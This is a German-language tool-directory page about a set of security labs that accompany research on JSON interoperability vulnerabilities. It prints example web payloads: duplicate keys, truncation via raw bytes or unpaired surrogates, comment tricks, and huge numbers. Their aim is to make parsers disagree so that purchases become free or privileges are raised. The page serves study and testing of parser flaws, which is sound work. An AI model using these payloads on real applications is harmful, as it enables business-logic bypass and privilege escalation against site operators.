Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
json-interop-vuln-labs — Begleitende Labs zu „An Exploration of JSON Interoperability Vulnerabilities“ | Kitploit
Tools/GitHubGitHub/bishopfox/json-interop-vuln-labs
SchwachstellenanalyseWebanwendungs-ExploitationWebsicherheitLernen & BildungLabs & Praxis
GitHubbishopfox/json-interop-vuln-labs

json-interop-vuln-labs

Begleitende Labs zu „An Exploration of JSON Interoperability Vulnerabilities“

Repository anzeigen
21019vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

Labs zu JSON-Interoperabilitätsschwachstellen

Beschreibung

Dies sind die Begleit-Labs zu meinem Forschungsartikel „An Exploration of JSON Interoperability Vulnerabilities“.

Lab 1: Kostenlose Käufe in einer E-Commerce-Anwendung

  • Key-Collision-Angriffe: Inkonsistente Priorität bei doppelten Schlüsseln
  • Inkonsistente Darstellungen großer Zahlen

Lab 2: Privilegieneskalation in einer Multi-Tenant-Anwendung

  • Key-Collision-Angriffe: Zeichenabschneidung

Diese Labs sind standardmäßig an die Host-Ports 5000-5004 gebunden.

Angriffstechniken

1. Schlüssel-Kollisionen

Inkonsistente Priorität bei doppelten Schlüsseln

root@kitploit:~
{"qty": 1, "qty": -1}

Zeichenabschneidung

Abschneidung bei Parsern mit Priorität des letzten Schlüssels (Reihenfolge für Priorität des ersten Schlüssels umkehren)

root@kitploit:~
{"qty": 1, "qty\<raw \x0d byte here>": -1}
{"qty": 1, "qty\ud800": -1} # Any unpaired surrogate U+D800-U+DFFF
{"qty": 1, "qty"": -1}
{"qty": 1, "qt\y": -1}

Kommentar-Abschneidung

Diese Dokumente nutzen die inkonsistente Unterstützung von Kommentaren und die Unterstützung von Zeichenketten ohne Anführungszeichen aus:

root@kitploit:~
{"qty": 1, "extra": 1/*, "qty": -1, "extra2": 2*/}
{"qty": 1, "extra": a/*, "qty": -1, "extra2": b*/}
{"qty": 1, "extra": "a/*", "qty": -1, "extra2": "b"*/}
{"qty": 1, "extra": "a"//, "qty": -1}

2. Zahlendekodierung

Inkonsistente Dekodierung großer Zahlen

Diese großen numerischen Werte können in Strings umgewandelt werden (z. B. „+Infinity“), was zu Type-Juggling-Schwachstellen führen kann. Oder sie können in MAX_INT/MIN_INT, gerundete Werte oder 0 umgewandelt werden, was eine Umgehung der Geschäftslogik ermöglichen kann.

root@kitploit:~
{"qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"qty": -999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"qty": 1.0e4096}
{"qty": -1.0e4096}

Autor

Twitter: @theBumbleSec

GitHub: the-bumble

Tool herunterladen